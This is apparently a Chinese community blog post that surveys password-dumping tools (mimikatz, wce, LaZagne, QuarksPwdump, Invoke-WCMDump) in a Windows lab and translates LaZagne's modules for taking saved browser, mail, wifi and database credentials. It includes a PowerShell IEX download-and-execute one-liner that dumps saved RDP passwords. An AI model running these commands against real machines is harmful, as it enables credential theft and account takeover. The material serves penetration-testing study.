【云+社区年度征文】密码抓取工具汇总及解读

声明：本文介绍的技术仅供网络安全技术人员及白帽子使用，任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为，一经发现直接上报国家安全机关处理

window

1. wce
2. Ivoke-WCMDump
3. Lazagne
4. QuarksPwdump
5. mimikatz
6. mimiDbg
7. Nirsoft_package
8. fgdump
9. 星号查看器

Linux

1. LaZagne
2. mimipenguin

没有介绍的百度都有使用也非常简单

使用讲解：

1、wce.exe

使用管理员登录，进入到软件所在目录，输入wce.exe -h可查看帮助信息

常用命令wce.exe -l

2、Invoke-WCMDump

先查看win2003的ip

在win2008中win+R输入mstsc打开远程桌面输入win2003ip，勾选保存凭证

输入win2003的账号密码，勾选两个保存凭证

成功连接后就可以退出了

查看物理机ip

将物理机ip加入powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.14/Invoke-WCMDump.ps1');Invoke-WCMDump"中，然后在win2008的终端中执行就能看到登陆过远程桌面的win2003密码了

3、Lazagne

这工具需要python环境，使用时进入所在目录即可，-h参数查看帮助

想获取哪方面的密码直接在后面加参数即可，功能翻译如下

chats               运行聊天模块
mails               运行邮件模块
all                 全部运行所有模块
git                 运行git模块
svn                 运行svn模块
windows				运行windows模块
wifi                运行wifi模块
maven               运行maven模块
sysadmin            运行sysadmin模块
browsers            浏览器运行浏览器模块
games               运行游戏模块
multimedia          运行多媒体模块
memory              运行存储器模块
databases           运行数据库模块
php                 运行php模块

4、QuarksPwdump

將QuarksPwdump上传到win2008中

点击下方的powershell按钮，然后进入软件目录直接执行该软件

然后复制选中区域，加到软件名后执行即可

欢迎关注公众号，原创不易，转载请注明来源哦😘